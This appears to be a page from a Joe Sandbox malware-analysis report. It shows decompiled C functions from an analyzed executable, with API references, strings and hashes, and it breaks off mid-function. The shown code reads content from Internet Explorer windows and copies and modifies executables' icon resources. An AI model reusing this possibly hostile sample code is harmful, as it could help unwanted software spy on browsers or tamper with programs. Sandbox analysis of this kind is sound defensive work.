Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #537
String ID: E-mail$Explore$None$Open$Print$User defined
API String ID: 4256512136-3616938308
Opcode ID: 8ea4d9701f576b8d0bb57b9b318c5dc9661946cb1bcca5c75464b0e8b31425bd
Instruction ID: d8e681bb3b3556ab0d8969b4d10cae8964d1c340cf36fced61d5ae8636ac7acc
Opcode Fuzzy Hash: 8ea4d9701f576b8d0bb57b9b318c5dc9661946cb1bcca5c75464b0e8b31425bd
Instruction Fuzzy Hash: 55D06200F40D409209187E51E43373D4842C79D7CB7B0A13F7D011F1D38D4C0A5D412D

Uniqueness

Uniqueness Score: -1.00%

Function 0041AAFE, Relevance: 19.6, APIs: 13, Instructions: 115
windowCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E0041AAFE(void* __ecx, void* __eflags) {
				intOrPtr* _t43;
				intOrPtr* _t46;
				intOrPtr _t53;
				intOrPtr _t56;
				void* _t60;
				signed int _t69;
				void* _t94;
				void* _t97;

				E0043E4E0(0x441490, _t97);
				_t94 = __ecx;
				L0043DF94();
				_t43 = E00429029(_t97 - 0x10, 0xe034);
				_push(0);
				_push(0);
				_t60 = _t94 + 0x68;
				_push( *_t43);
				_push(0);
				_push(1);
				 *(_t97 - 4) = 0;
				L0043E0C0();
				 *(_t97 - 4) =  *(_t97 - 4) | 0xffffffff;
				L0043DD36();
				_t46 = E00429029(_t97 - 0x14, 0xe033);
				_t69 = 1;
				_push(0);
				_push(0);
				_push( *_t46);
				_push(_t69);
				 *(_t97 - 4) = _t69;
				_push(_t69);
				L0043E0C0();
				 *(_t97 - 4) =  *(_t97 - 4) | 0xffffffff;
				L0043DD36();
				SendMessageA( *(_t94 + 0x88), 0x130a, 0, _t97 - 0x34);
				 *((intOrPtr*)(_t97 - 0x28)) =  *((intOrPtr*)(_t97 - 0x28)) + 1;
				GetWindowRect( *(_t94 + 0x88), _t97 - 0x24);
				_push(_t60);
				_push(0xbc);
				 *((intOrPtr*)(_t94 + 0x3e8)) =  *((intOrPtr*)(_t94 + 0x64));
				L0043E0BA();
				_t53 =  *((intOrPtr*)(_t97 - 0x28));
				_push(4);
				_push( *((intOrPtr*)(_t97 - 0x30)) -  *((intOrPtr*)(_t97 - 0x20)) - _t53 +  *((intOrPtr*)(_t97 - 0x18)));
				_push( *((intOrPtr*)(_t97 - 0x1c)) -  *(_t97 - 0x24));
				_push(_t53 -  *((intOrPtr*)(_t97 - 0x30)));
				_push(0);
				_push(0);
				L0043E0B4();
				_push(5);
				L0043E0AE();
				_push(_t60);
				 *((intOrPtr*)(_t94 + 0x330)) =  *((intOrPtr*)(_t94 + 0x64));
				_push(0xbb);
				L0043E0BA();
				_t56 =  *((intOrPtr*)(_t97 - 0x28));
				_push(4);
				_push( *((intOrPtr*)(_t97 - 0x30)) -  *((intOrPtr*)(_t97 - 0x20)) - _t56 +  *((intOrPtr*)(_t97 - 0x18)));
				_push( *((intOrPtr*)(_t97 - 0x1c)) -  *(_t97 - 0x24));
				_push(_t56 -  *((intOrPtr*)(_t97 - 0x30)));
				_push(0);
				_push(0);
				L0043E0B4();
				 *[fs:0x0] =  *((intOrPtr*)(_t97 - 0xc));
				return 0;
			}

0x0041ab03
0x0041ab0e
0x0041ab10
0x0041ab1e
0x0041ab29
0x0041ab2a
0x0041ab2b
0x0041ab2e
0x0041ab2f
0x0041ab30
0x0041ab34
0x0041ab37
0x0041ab3c
0x0041ab43
0x0041ab51
0x0041ab5c
0x0041ab5d
0x0041ab5e
0x0041ab5f
0x0041ab60
0x0041ab61
0x0041ab64
0x0041ab67
0x0041ab6c
0x0041ab73
0x0041ab88
0x0041ab8e
0x0041ab9b
0x0041aba4
0x0041abab
0x0041abb0
0x0041abb6
0x0041abbe
0x0041abc4
0x0041abce
0x0041abd5
0x0041abd6
0x0041abd7
0x0041abd8
0x0041abdf
0x0041abe4
0x0041abec
0x0041abf4
0x0041abf5
0x0041ac01
0x0041ac08
0x0041ac10
0x0041ac16
0x0041ac20
0x0041ac27
0x0041ac28
0x0041ac29
0x0041ac2a
0x0041ac2d
0x0041ac3a
0x0041ac42

APIs

__EH_prolog.LIBCMT ref: 0041AB03
#4710.MFC42 ref: 0041AB10

Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A

#6785.MFC42(00000001,00000000,?,00000000,00000000), ref: 0041AB37
#800.MFC42(00000001,00000000,?,00000000,00000000), ref: 0041AB43
#6785.MFC42(00000001,00000001,?,00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0041AB67
#800.MFC42(00000001,00000001,?,00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0041AB73
SendMessageA.USER32(?,0000130A,00000000,?), ref: 0041AB88
GetWindowRect.USER32 ref: 0041AB9B
#2086.MFC42(000000BC,?), ref: 0041ABB6
#6197.MFC42(00000000,00000000,?,?,?,00000004,000000BC,?), ref: 0041ABDF
#6215.MFC42(00000005,00000000,00000000,?,?,?,00000004,000000BC,?), ref: 0041ABEC
#2086.MFC42(000000BB,?,00000005,00000000,00000000,?,?,?,00000004,000000BC,?), ref: 0041AC08
#6197.MFC42(00000000,00000000,?,?,?,00000004,000000BB,?,00000005,00000000,00000000,?,?,?,00000004,000000BC), ref: 0041AC2D

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #2086#6197#6785#800$#1168#4710#537#6215H_prologLoadMessageRectSendStringWindow
String ID:
API String ID: 2000107981-0
Opcode ID: d6bbc5df169f1a800bb89b471a498c62810dd4ddbed4d7975560cbf4da3130ff
Instruction ID: 711013d8f30aee6a9544559c11b86ef6319ac96989f8aa6d0100954685e50752
Opcode Fuzzy Hash: d6bbc5df169f1a800bb89b471a498c62810dd4ddbed4d7975560cbf4da3130ff
Instruction Fuzzy Hash: 0B414F71900218AFDB18EBBADD95EEFB7B8FB88714F00051DF516A71C0DA746A41CB24

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF77, Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 255
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040AF77(intOrPtr __ecx) {
				struct HWND__* _t98;
				struct HWND__* _t99;
				intOrPtr _t103;
				intOrPtr* _t108;
				intOrPtr* _t110;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t117;
				void* _t119;
				intOrPtr* _t120;
				intOrPtr* _t121;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr* _t131;
				intOrPtr* _t133;
				void* _t136;
				void* _t137;
				intOrPtr* _t138;
				void* _t139;
				intOrPtr* _t140;
				intOrPtr* _t141;
				intOrPtr* _t142;
				intOrPtr* _t143;
				intOrPtr _t174;
				struct HWND__* _t195;
				void* _t196;
				void* _t197;

				E0043E4E0(0x43fc5c, _t197);
				 *((intOrPtr*)(_t197 - 0x28)) = __ecx;
				 *(_t197 - 0x38) = 0;
				_t98 = 0;
				while(1) {
					_t99 = FindWindowExA( *(_t197 + 0xc), _t98, "__oxFrame.class__", 0);
					 *(_t197 - 0x38) = _t99;
					if(_t99 == 0) {
						break;
					}
					_t195 = FindWindowExA(_t99, 0, "Internet Explorer_Server", 0);
					if(_t195 == 0 || IsWindowVisible(_t195) == 0) {
						L29:
						_t98 =  *(_t197 - 0x38);
						continue;
					} else {
						_t103 =  *((intOrPtr*)(_t197 - 0x28));
						if( *((intOrPtr*)(_t103 + 0xc)) == 0) {
							goto L29;
						}
						SendMessageTimeoutA(_t195,  *(_t103 + 4), 0, 0, 2, 0x96, _t197 - 0x30);
						 *((intOrPtr*)(_t197 - 0x24)) = 0;
						 *(_t197 - 4) = 0;
						_push(_t197 - 0x24);
						_push(0);
						_push(0x44a5c4);
						_push( *(_t197 - 0x30));
						if( *((intOrPtr*)( *((intOrPtr*)(_t197 - 0x28)) + 0xc))() < 0) {
							L27:
							_t108 =  *((intOrPtr*)(_t197 - 0x24));
							 *(_t197 - 4) =  *(_t197 - 4) | 0xffffffff;
							if(_t108 != 0) {
								 *((intOrPtr*)( *_t108 + 8))(_t108);
							}
							goto L29;
						}
						 *((intOrPtr*)(_t197 - 0x14)) = 0;
						_t110 =  *((intOrPtr*)(_t197 - 0x24));
						_push(_t197 - 0x14);
						_push(_t110);
						 *(_t197 - 4) = 1;
						if( *((intOrPtr*)( *_t110 + 0x5c))() < 0) {
							L25:
							_t112 =  *((intOrPtr*)(_t197 - 0x14));
							 *(_t197 - 4) = 0;
							if(_t112 != 0) {
								 *((intOrPtr*)( *_t112 + 8))(_t112);
							}
							goto L27;
						}
						_t114 =  *((intOrPtr*)(_t197 - 0x14));
						 *((intOrPtr*)( *_t114 + 0x20))(_t114, _t197 - 0x2c);
						_t196 = 0;
						if( *((intOrPtr*)(_t197 - 0x2c)) <= 0) {
							goto L25;
						} else {
							goto L8;
						}
						do {
							L8:
							 *((intOrPtr*)(_t197 - 0x20)) = 0;
							 *((intOrPtr*)(_t197 - 0x1c)) = 0;
							 *(_t197 - 4) = 3;
							E0040B247(_t197 - 0x48, _t196, 3);
							_t117 =  *((intOrPtr*)(_t197 - 0x14));
							_push(_t197 - 0x58);
							_push(_t197 - 0x48);
							_push(_t117);
							 *(_t197 - 4) = 4;
							if( *((intOrPtr*)( *_t117 + 0x1c))() < 0) {
								goto L18;
							}
							_t125 =  *((intOrPtr*)(_t197 - 0x50));
							_push(_t197 - 0x20);
							_push(0x44a5b4);
							_push(_t125);
							if( *((intOrPtr*)( *_t125))() < 0) {
								goto L18;
							}
							_t127 =  *((intOrPtr*)(_t197 - 0x20));
							_push(_t197 - 0x1c);
							_push(_t127);
							if( *((intOrPtr*)( *_t127 + 0xd0))() < 0) {
								goto L18;
							}
							 *((intOrPtr*)(_t197 - 0x18)) = 0;
							_t129 =  *((intOrPtr*)(_t197 - 0x1c));
							_push(_t197 - 0x18);
							_push(_t129);
							 *(_t197 - 4) = 5;
							if( *((intOrPtr*)( *_t129 + 0x24))() < 0) {
								L16:
								_t131 =  *((intOrPtr*)(_t197 - 0x18));
								 *(_t197 - 4) = 4;
								if(_t131 != 0) {
									 *((intOrPtr*)( *_t131 + 8))(_t131);
								}
								goto L18;
							}
							_t133 =  *((intOrPtr*)(_t197 - 0x18));
							_push(_t197 - 0x34);
							_push(_t133);
							if( *((intOrPtr*)( *_t133 + 0xf0))() < 0) {
								goto L16;
							}
							_push( *((intOrPtr*)(_t197 - 0x34)));
							E00409C88(_t197 - 0x10);
							 *(_t197 - 4) = 6;
							_t136 = E0040B230(_t197 - 0x10);
							_t174 =  *((intOrPtr*)(_t197 - 0x10));
							if(_t136 > 0) {
								if(_t174 == 0) {
									_t137 = 0;
								} else {
									_t137 = E00409D10(_t174);
								}
								_push(_t137);
								L0043DE26();
								_t176 =  *((intOrPtr*)(_t197 - 0x10));
								if( *((intOrPtr*)(_t197 - 0x10)) != 0) {
									E004096DD(_t176);
									 *((intOrPtr*)(_t197 - 0x10)) = 0;
								}
								_t138 =  *((intOrPtr*)(_t197 - 0x18));
								 *(_t197 - 4) = 4;
								if(_t138 != 0) {
									 *((intOrPtr*)( *_t138 + 8))(_t138);
								}
								_t139 = _t197 - 0x48;
								 *(_t197 - 4) = 3;
								__imp__#9(_t139);
								if(_t139 < 0) {
									E0043E9F0(_t139);
								}
								_t140 =  *((intOrPtr*)(_t197 - 0x1c));
								 *(_t197 - 4) = 2;
								if(_t140 != 0) {
									 *((intOrPtr*)( *_t140 + 8))(_t140);
								}
								_t141 =  *((intOrPtr*)(_t197 - 0x20));
								 *(_t197 - 4) = 1;
								if(_t141 != 0) {
									 *((intOrPtr*)( *_t141 + 8))(_t141);
								}
								_t142 =  *((intOrPtr*)(_t197 - 0x14));
								 *(_t197 - 4) = 0;
								if(_t142 != 0) {
									 *((intOrPtr*)( *_t142 + 8))(_t142);
								}
								_t143 =  *((intOrPtr*)(_t197 - 0x24));
								 *(_t197 - 4) =  *(_t197 - 4) | 0xffffffff;
								if(_t143 != 0) {
									 *((intOrPtr*)( *_t143 + 8))(_t143);
								}
								L48:
								 *[fs:0x0] =  *((intOrPtr*)(_t197 - 0xc));
								return  *((intOrPtr*)(_t197 + 8));
							} else {
								if(_t174 != 0) {
									E004096DD(_t174);
									 *((intOrPtr*)(_t197 - 0x10)) = 0;
								}
								goto L16;
							}
							L18:
							_t119 = _t197 - 0x48;
							 *(_t197 - 4) = 3;
							__imp__#9(_t119);
							if(_t119 < 0) {
								E0043E9F0(_t119);
							}
							_t120 =  *((intOrPtr*)(_t197 - 0x1c));
							 *(_t197 - 4) = 2;
							if(_t120 != 0) {
								 *((intOrPtr*)( *_t120 + 8))(_t120);
							}
							_t121 =  *((intOrPtr*)(_t197 - 0x20));
							 *(_t197 - 4) = 1;
							if(_t121 != 0) {
								 *((intOrPtr*)( *_t121 + 8))(_t121);
							}
							_t196 = _t196 + 1;
						} while (_t196 <  *((intOrPtr*)(_t197 - 0x2c)));
						goto L25;
					}
				}
				_push(0x4550cc);
				L0043DE26();
				goto L48;
			}

0x0040af7c
0x0040af8f
0x0040af92
0x0040af95
0x0040af97
0x0040afa1
0x0040afa5
0x0040afa8
0x00000000
0x00000000
0x0040afb8
0x0040afbc
0x0040b174
0x0040b174
0x00000000
0x0040afd1
0x0040afd1
0x0040afd7
0x00000000
0x00000000
0x0040afee
0x0040aff4
0x0040affa
0x0040affd
0x0040b001
0x0040b002
0x0040b007
0x0040b00f
0x0040b163
0x0040b163
0x0040b166
0x0040b16c
0x0040b171
0x0040b171
0x00000000
0x0040b16c
0x0040b015
0x0040b018
0x0040b01e
0x0040b01f
0x0040b022
0x0040b02b
0x0040b153
0x0040b153
0x0040b156
0x0040b15b
0x0040b160
0x0040b160
0x00000000
0x0040b15b
0x0040b031
0x0040b03b
0x0040b03e
0x0040b043
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b049
0x0040b049
0x0040b049
0x0040b04c
0x0040b055
0x0040b059
0x0040b05e
0x0040b064
0x0040b06a
0x0040b06b
0x0040b06c
0x0040b075
0x00000000
0x00000000
0x0040b07b
0x0040b081
0x0040b082
0x0040b089
0x0040b08e
0x00000000
0x00000000
0x0040b090
0x0040b096
0x0040b097
0x0040b0a2
0x00000000
0x00000000
0x0040b0a4
0x0040b0a7
0x0040b0ad
0x0040b0ae
0x0040b0b1
0x0040b0ba
0x0040b0fe
0x0040b0fe
0x0040b101
0x0040b107
0x0040b10c
0x0040b10c
0x00000000
0x0040b107
0x0040b0bc
0x0040b0c2
0x0040b0c3
0x0040b0ce
0x00000000
0x00000000
0x0040b0d0
0x0040b0d6
0x0040b0de
0x0040b0e2
0x0040b0e7
0x0040b0ec
0x0040b17e
0x0040b187
0x0040b180
0x0040b180
0x0040b180
0x0040b18c
0x0040b18d
0x0040b192
0x0040b197
0x0040b199
0x0040b19e
0x0040b19e
0x0040b1a1
0x0040b1a4
0x0040b1aa
0x0040b1af
0x0040b1af
0x0040b1b2
0x0040b1b5
0x0040b1ba
0x0040b1c2
0x0040b1c5
0x0040b1c5
0x0040b1ca
0x0040b1cd
0x0040b1d3
0x0040b1d8
0x0040b1d8
0x0040b1db
0x0040b1de
0x0040b1e4
0x0040b1e9
0x0040b1e9
0x0040b1ec
0x0040b1ef
0x0040b1f4
0x0040b1f9
0x0040b1f9
0x0040b1fc
0x0040b1ff
0x0040b205
0x0040b20a
0x0040b20a
0x0040b21c
0x0040b225
0x0040b22d
0x0040b0f2
0x0040b0f4
0x0040b0f6
0x0040b0fb
0x0040b0fb
0x00000000
0x0040b0f4
0x0040b10f
0x0040b10f
0x0040b112
0x0040b117
0x0040b11f
0x0040b122
0x0040b122
0x0040b127
0x0040b12a
0x0040b130
0x0040b135
0x0040b135
0x0040b138
0x0040b13b
0x0040b141
0x0040b146
0x0040b146
0x0040b149
0x0040b14a
0x00000000
0x0040b049
0x0040afbc
0x0040b212
0x0040b217
0x00000000

APIs

__EH_prolog.LIBCMT ref: 0040AF7C
FindWindowExA.USER32 ref: 0040AFA1
FindWindowExA.USER32 ref: 0040AFB6
IsWindowVisible.USER32(00000000), ref: 0040AFC3
SendMessageTimeoutA.USER32(00000000,?,00000000,00000000,00000002,00000096,?), ref: 0040AFEE
VariantClear.OLEAUT32(?), ref: 0040B117
#537.MFC42(00000000,?), ref: 0040B18D
VariantClear.OLEAUT32(?), ref: 0040B1BA

Part of subcall function 00409C88: __EH_prolog.LIBCMT ref: 00409C8D
Part of subcall function 00409C88: #823.MFC42(0000000C,?,?,00409C09,?), ref: 00409C98

Part of subcall function 0040B230: SysStringLen.OLEAUT32(?), ref: 0040B23D

Part of subcall function 004096DD: InterlockedDecrement.KERNEL32(?), ref: 004096E5
Part of subcall function 004096DD: #825.MFC42(?,?,?,00409C31,00000000,?), ref: 004096FB

#537.MFC42(004550CC), ref: 0040B217

Strings

Internet Explorer_Server, xrefs: 0040AFAF
__oxFrame.class__, xrefs: 0040AF98

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: Window$#537ClearFindH_prologVariant$#823#825DecrementInterlockedMessageSendStringTimeoutVisible
String ID: Internet Explorer_Server$__oxFrame.class__
API String ID: 2030211506-2130105940
Opcode ID: 4803cb8ab8e7e75c336869eebb68517a9ddeeb149cf9f22aaf2aa75b5ac8771f
Instruction ID: ff4c85a8c34329071e528f010ba7848a82558d54f1513503db4c9009f77d86a4
Opcode Fuzzy Hash: 4803cb8ab8e7e75c336869eebb68517a9ddeeb149cf9f22aaf2aa75b5ac8771f
Instruction Fuzzy Hash: 4BA11F70A00249EFCB10DFE4C898AAEBBB9EF49344F24446DE505FB291C7789D45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041C752, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 176
filelibrarystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041C752(intOrPtr* __ecx, void* __edi, CHAR* _a4, void* _a8) {
				signed int _v8;
				char _v268;
				char _v528;
				intOrPtr _t60;
				struct HINSTANCE__* _t70;
				void* _t71;
				char* _t82;
				int _t83;
				void* _t84;
				_Unknown_base(*)()* _t85;
				signed int _t91;
				void* _t92;
				CHAR* _t102;
				signed short* _t103;
				intOrPtr* _t105;
				void* _t127;

				_v8 = _v8 | 0xffffffff;
				_t105 = __ecx;
				_t83 = 0;
				if( *((intOrPtr*)(__ecx + 0x10)) == 0 ||  *((intOrPtr*)(__ecx + 0x18)) == 0 ||  *((intOrPtr*)(__ecx + 0x14)) == 0 || GetTempPathA(0x104,  &_v528) == 0 || GetTempFileNameA( &_v528, "bpk", 0,  &_v268) == 0 || CopyFileA(_a4,  &_v268, 0) == 0) {
					return 0;
				} else {
					_t60 =  *((intOrPtr*)(_t105 + 0x10))( &_v268, 0, __edi);
					 *_t105 = _t60;
					if(_t60 == 0) {
						L30:
						E0041C726(_t105);
						if(_v8 != _t83) {
							L33:
							if(_t127 < 0) {
								E0041C947(_t105, _t83);
							}
							L35:
							DeleteFileA( &_v268);
							return 0 | _v8 == _t83;
						}
						if(CopyFileA( &_v268, _a4, _t83) != 0) {
							goto L35;
						}
						_v8 = _v8 | 0xffffffff;
						_t127 = _v8 - _t83;
						goto L33;
					}
					_t102 = 0xe;
					 *((intOrPtr*)(_t105 + 0x14))(_t60, _t102, 0x64,  *((intOrPtr*)(_t105 + 0xc)), 0, 0);
					_t70 = LoadLibraryA(_a8);
					 *(_t105 + 4) = _t70;
					if(_t70 == 0) {
						_v8 = 1;
						goto L30;
					}
					if( *((intOrPtr*)(_t105 + 0x24)) == 0) {
						L13:
						_t71 = E0041C9A7(_t105, "MAINICON", _t102);
						if(_t71 != _t83) {
							L18:
							_t91 =  *(_t71 + 4) & 0x0000ffff;
							_t92 = _t91 - 1;
							if(_t91 == 0) {
								L22:
								_v8 = _t83;
								goto L30;
							}
							_t28 = _t71 + 0x12; // 0x12
							_t103 = _t28;
							_t84 = _t92 + 1;
							do {
								E0041C9A7(_t105,  *_t103 & 0x0000ffff, 3);
								_t103 =  &(_t103[7]);
								_t84 = _t84 - 1;
							} while (_t84 != 0);
							_t83 = 0;
							goto L22;
						}
						_a8 = _a8 | 0xffffffff;
						_t85 = E0041C989;
						if(EnumResourceNamesA( *(_t105 + 4), _t102, E0041C989,  &_a8) == 0 || _a8 < 0) {
							_a8 = _a8 | 0xffffffff;
							if(EnumResourceNamesA( *(_t105 + 4), 3, _t85,  &_a8) == 0 || _a8 < 0 || E0041C9A7(_t105, _a8 & 0x0000ffff, 3) == 0) {
								_v8 = 2;
							} else {
								_v8 = _v8 & 0x00000000;
							}
							goto L29;
						} else {
							_t71 = E0041C9A7(_t105, _a8 & 0x0000ffff, 0xe);
							if(_t71 == 0) {
								L29:
								_t83 = 0;
								goto L30;
							}
							_t83 = 0;
							goto L18;
						}
					}
					if(strcmp( *(_t105 + 0x1c), 0x4550cc) != 0) {
						_t82 =  *(_t105 + 0x1c);
					} else {
						_t82 =  *(_t105 + 0x20);
					}
					_t71 = E0041C9A7(_t105, _t82, _t102);
					if(_t71 != _t83) {
						goto L18;
					} else {
						goto L13;
					}
				}
			}

0x0041c75b
0x0041c761
0x0041c763
0x0041c768
0x00000000
0x0041c7d5
0x0041c7de
0x0041c7e3
0x0041c7e5
0x0041c8f5
0x0041c8f7
0x0041c900
0x0041c91e
0x0041c91e
0x0041c923
0x0041c923
0x0041c928
0x0041c92f
0x00000000
0x0041c93a
0x0041c915
0x00000000
0x00000000
0x0041c917
0x0041c91b
0x00000000
0x0041c91b
0x0041c7f6
0x0041c7f9
0x0041c7ff
0x0041c807
0x0041c80a
0x0041c8b1
0x00000000
0x0041c8b1
0x0041c813
0x0041c83d
0x0041c845
0x0041c84c
0x0041c886
0x0041c886
0x0041c88c
0x0041c88f
0x0041c8ac
0x0041c8ac
0x00000000
0x0041c8ac
0x0041c891
0x0041c891
0x0041c894
0x0041c897
0x0041c89f
0x0041c8a4
0x0041c8a7
0x0041c8a7
0x0041c8aa
0x00000000
0x0041c8aa
0x0041c84e
0x0041c855
0x0041c86a
0x0041c8ba
0x0041c8cc
0x0041c8ec
0x0041c8e6
0x0041c8e6
0x0041c8e6
0x00000000
0x0041c872
0x0041c87b
0x0041c882
0x0041c8f3
0x0041c8f3
0x00000000
0x0041c8f3
0x0041c884
0x00000000
0x0041c884
0x0041c86a
0x0041c826
0x0041c82d
0x0041c828
0x0041c828
0x0041c828
0x0041c834
0x0041c83b
0x00000000
0x00000000
0x00000000
0x00000000
0x0041c83b

APIs

GetTempPathA.KERNEL32(00000104,?), ref: 0041C78C
GetTempFileNameA.KERNEL32(?,bpk,00000000,?), ref: 0041C7AE
CopyFileA.KERNEL32(?,?,00000000), ref: 0041C7C7
LoadLibraryA.KERNEL32(?), ref: 0041C7FF
strcmp.MSVCRT ref: 0041C81D
EnumResourceNamesA.KERNEL32 ref: 0041C866
EnumResourceNamesA.KERNEL32 ref: 0041C8C8
CopyFileA.KERNEL32(?,?,00000000), ref: 0041C90D
DeleteFileA.KERNEL32(?), ref: 0041C92F

Strings

MAINICON, xrefs: 0041C83E
bpk, xrefs: 0041C7A8

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: File$CopyEnumNamesResourceTemp$DeleteLibraryLoadNamePathstrcmp
String ID: MAINICON$bpk
API String ID: 1789158672-2105560083
Opcode ID: cf1cd4e851163cce69de40d3f47791d20a31fa57d18228b2b51ab5566016067c
Instruction ID: c2eefb00d127a9bf25f53e05fb0f3bbdf1ac41dbb1b711e3978f1e215856471e
Opcode Fuzzy Hash: cf1cd4e851163cce69de40d3f47791d20a31fa57d18228b2b51ab5566016067c
Instruction Fuzzy Hash: 4D51DFB1640205EFDB20AFA5CDC9BEF77A8AB04715F10812FB556D2190E778CAC4CB28

Uniqueness

Uniqueness Score: -1.00%

Function 0040D3F6, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 94
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 93%

			E0040D3F6(intOrPtr __ecx) {
				void* __esi;
				void* _t50;
				void* _t51;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t57;
				intOrPtr _t62;
				signed int _t84;
